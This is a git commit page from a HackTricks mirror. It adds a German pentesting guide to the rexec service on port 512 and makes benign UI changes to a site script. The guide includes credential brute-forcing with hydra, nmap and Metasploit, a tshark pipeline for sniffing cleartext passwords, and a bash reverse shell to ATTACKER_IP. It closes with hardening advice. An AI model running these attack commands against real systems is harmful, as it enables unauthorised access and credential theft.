maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/network-services-pentesting/512-pentesting-rexec.md'] t

Browse Source
This commit is contained in:
Translator 2025-07-15 22:08:43 +00:00
parent 5031e65a6e
commit 189e86c902
2 changed files with 167 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

94
src/network-services-pentesting/512-pentesting-rexec.md
View File

@ -2,17 +2,103 @@
{{#include ../banners/hacktricks-training.md}} {{#include ../banners/hacktricks-training.md}}
## Grundinformationen
## Grundlegende Informationen Rexec (remote **exec**) ist einer der ursprünglichen Berkeley *r*-Dienste (neben `rlogin`, `rsh`, …). Es bietet eine **Remote-Befehlsausführungs**-Funktionalität, die **nur mit einem Klartext-Benutzernamen und Passwort authentifiziert** ist. Das Protokoll wurde Anfang der 1980er Jahre definiert (siehe RFC 1060) und wird heutzutage als **von Grund auf unsicher** angesehen. Dennoch ist es in einigen veralteten UNIX- / netzwerkgebundenen Geräten standardmäßig aktiviert und taucht gelegentlich während interner Pentests auf.
Es ist ein Dienst, der **es Ihnen ermöglicht, einen Befehl auf einem Host auszuführen**, wenn Sie gültige **Anmeldeinformationen** (Benutzername und Passwort) kennen. **Standardport:** TCP 512 (`exec`)
**Standardport:** 512
``` ```
PORT STATE SERVICE PORT STATE SERVICE
512/tcp open exec 512/tcp open exec
``` ```
> 🔥 Der gesamte Datenverkehr einschließlich Anmeldeinformationen wird **unverschlüsselt** übertragen. Jeder, der in der Lage ist, das Netzwerk abzuhören, kann den Benutzernamen, das Passwort und den Befehl wiederherstellen.
### Protokollübersicht
1. Der Client verbindet sich mit TCP 512.
2. Der Client sendet drei **NUL-terminierte** Zeichenfolgen:
* die Portnummer (als ASCII), an die er stdout/stderr empfangen möchte (oft `0`),
* den **Benutzernamen**,
* das **Passwort**.
3. Eine letzte NUL-terminierte Zeichenfolge mit dem **Befehl**, der ausgeführt werden soll, wird gesendet.
4. Der Server antwortet mit einem einzelnen 8-Bit-Statusbyte (0 = Erfolg, `1` = Fehler), gefolgt von der Befehlsausgabe.
Das bedeutet, dass Sie den Austausch mit nichts anderem als `echo -e` und `nc` reproduzieren können:
```bash
(echo -ne "0\0user\0password\0id\0"; cat) | nc <target> 512
```
Wenn die Anmeldeinformationen gültig sind, erhalten Sie die Ausgabe von `id` direkt über dieselbe Verbindung.
### Manuelle Verwendung mit dem Client
Viele Linux-Distributionen liefern immer noch den Legacy-Client im **inetutils-rexec** / **rsh-client**-Paket aus:
```bash
rexec -l user -p password <target> "uname -a"
```
Wenn `-p` weggelassen wird, fordert der Client interaktiv das Passwort an (sichtbar im Netzwerk im Klartext!).
---
## Enumeration & Brute-forcing
### [**Brute-force**](../generic-hacking/brute-force.md#rexec) ### [**Brute-force**](../generic-hacking/brute-force.md#rexec)
### Nmap
```bash
nmap -p 512 --script rexec-info <target>
# Discover service banner and test for stdout port mis-configuration
nmap -p 512 --script rexec-brute --script-args "userdb=users.txt,passdb=rockyou.txt" <target>
```
Das `rexec-brute` NSE verwendet das oben beschriebene Protokoll, um Anmeldeinformationen sehr schnell auszuprobieren.
### Hydra / Medusa / Ncrack
```bash
hydra -L users.txt -P passwords.txt rexec://<target> -s 512 -t 8
```
`hydra` hat ein dediziertes **rexec**-Modul und bleibt der schnellste Offline-Bruteforcer. `medusa` (`-M REXEC`) und `ncrack` (`rexec`-Modul) können auf die gleiche Weise verwendet werden.
### Metasploit
```
use auxiliary/scanner/rservices/rexec_login
set RHOSTS <target>
set USER_FILE users.txt
set PASS_FILE passwords.txt
run
```
Das Modul wird bei Erfolg eine Shell erzeugen und die Anmeldeinformationen in der Datenbank speichern.
---
## Sniffing von Anmeldeinformationen
Da alles im Klartext vorliegt, sind **Netzwerkaufzeichnungen unbezahlbar**. Mit einer Kopie des Traffics können Sie Anmeldeinformationen extrahieren, ohne das Ziel zu berühren:
```bash
tshark -r traffic.pcap -Y 'tcp.port == 512' -T fields -e data.decoded | \
awk -F"\\0" '{print $2":"$3" -> "$4}' # username:password -> command
```
(In Wireshark *Decode As …​* TCP 512 → REXEC aktivieren, um schön geparste Felder anzuzeigen.)
---
## Tipps zur Nachnutzung
* Befehle werden mit den Rechten des angegebenen Benutzers ausgeführt. Wenn `/etc/pam.d/rexec` falsch konfiguriert ist (z. B. `pam_rootok`), sind Root-Shells manchmal möglich.
* Rexec ignoriert die Shell des Benutzers und führt den Befehl über `/bin/sh -c <cmd>` aus. Sie können daher typische Shell-Escape-Tricks (`;`, ``$( )``, Backticks) verwenden, um mehrere Befehle zu verketten oder Reverse-Shells zu starten:
```bash
rexec -l user -p pass <target> 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'
```
* Passwörter werden oft in **~/.netrc** auf anderen Systemen gespeichert; wenn Sie einen Host kompromittieren, können Sie diese für laterale Bewegungen wiederverwenden.
---
## Härtung / Erkennung
* **Setzen Sie rexec nicht aus**; ersetzen Sie es durch SSH. Praktisch alle modernen *inetd* Superserver kommentieren den Dienst standardmäßig aus.
* Wenn Sie es behalten müssen, beschränken Sie den Zugriff mit TCP-Wrappers (`/etc/hosts.allow`) oder Firewall-Regeln und erzwingen Sie starke passworts pro Konto.
* Überwachen Sie den Verkehr zu :512 und die Starts des `rexecd` Prozesses. Eine einzige Paketaufnahme reicht aus, um eine Kompromittierung zu erkennen.
* Deaktivieren Sie `rexec`, `rlogin`, `rsh` zusammen sie teilen sich den größten Teil des gleichen Codes und Schwächen.
---
## Referenzen
* Nmap NSE `rexec-brute` Dokumentation [https://nmap.org/nsedoc/scripts/rexec-brute.html](https://nmap.org/nsedoc/scripts/rexec-brute.html)
* Rapid7 Metasploit Modul `auxiliary/scanner/rservices/rexec_login` [https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login](https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login)
{{#include ../banners/hacktricks-training.md}} {{#include ../banners/hacktricks-training.md}}

79
theme/ai.js
View File

@ -1,11 +1,86 @@
/**
* HackTricks Training Discounts
*/
(() => {
const KEY = 'htSummerDiscountDismissed';
const IMG = '/images/discount.jpeg';
const TXT = 'HT Summer Discount, Last Days!';
/* Stop if user already dismissed */
if (localStorage.getItem(KEY) === 'true') return;
/* Quick helper */
const $ = (tag, css = '') => Object.assign(document.createElement(tag), { style: css });
/* --- Overlay (blur + dim) --- */
const overlay = $('div', `
position: fixed; inset: 0;
background: rgba(0,0,0,.4);
backdrop-filter: blur(6px);
display: flex; justify-content: center; align-items: center;
z-index: 10000;
`);
/* --- Modal --- */
const modal = $('div', `
max-width: 90vw; width: 480px;
background: #fff; border-radius: 12px; overflow: hidden;
box-shadow: 0 8px 24px rgba(0,0,0,.35);
font-family: system-ui, sans-serif;
display: flex; flex-direction: column; align-items: stretch;
`);
/* --- Title bar (separate, over image) --- */
const titleBar = $('div', `
padding: 1rem; text-align: center;
background: #222; color: #fff;
font-size: 1.3rem; font-weight: 700;
`);
titleBar.textContent = TXT;
/* --- Image --- */
const img = $('img');
img.src = IMG; img.alt = TXT; img.style.width = '100%';
/* --- Checkbox row --- */
const label = $('label', `
display: flex; align-items: center; justify-content: center; gap: .6rem;
padding: 1rem; font-size: 1rem; color: #222; cursor: pointer;
`);
const cb = $('input'); cb.type = 'checkbox'; cb.style.scale = '1.2';
cb.onchange = () => {
if (cb.checked) {
localStorage.setItem(KEY, 'true');
overlay.remove();
}
};
label.append(cb, document.createTextNode("Don't show again"));
/* --- Assemble & inject --- */
modal.append(titleBar, img, label);
overlay.appendChild(modal);
(document.readyState === 'loading'
? () => document.addEventListener('DOMContentLoaded', () => document.body.appendChild(overlay), { once: true })
: () => document.body.appendChild(overlay))();
})();
/** /**
* HackTricks AI Chat Widget v1.16 resizable sidebar * HackTricks AI Chat Widget v1.16 resizable sidebar
* --------------------------------------------------- * ---------------------------------------------------
* Markdown rendering + sanitised (same as before) * Markdown rendering + sanitised (same as before)
* NEW: dragtoresize panel, width persists via localStorage * NEW: dragtoresize panel, width persists via localStorage
*/ */
(function () { (function () {
const LOG = "[HackTricksAI]"; const LOG = "[HackTricks-AI]";
/* ---------------- Usertunable constants ---------------- */ /* ---------------- Usertunable constants ---------------- */
const MAX_CONTEXT = 3000; // highlightedtext char limit const MAX_CONTEXT = 3000; // highlightedtext char limit
const MAX_QUESTION = 500; // question char limit const MAX_QUESTION = 500; // question char limit
@ -13,7 +88,7 @@
const MAX_W = 600; const MAX_W = 600;
const DEF_W = 350; // default width (if nothing saved) const DEF_W = 350; // default width (if nothing saved)
const TOOLTIP_TEXT = const TOOLTIP_TEXT =
"💡 Highlight any text on the page,\nthen click to ask HackTricks AI about it"; "💡 Highlight any text on the page,\nthen click to ask HackTricks AI about it";
const API_BASE = "https://www.hacktricks.ai/api/assistants/threads"; const API_BASE = "https://www.hacktricks.ai/api/assistants/threads";
const BRAND_RED = "#b31328"; const BRAND_RED = "#b31328";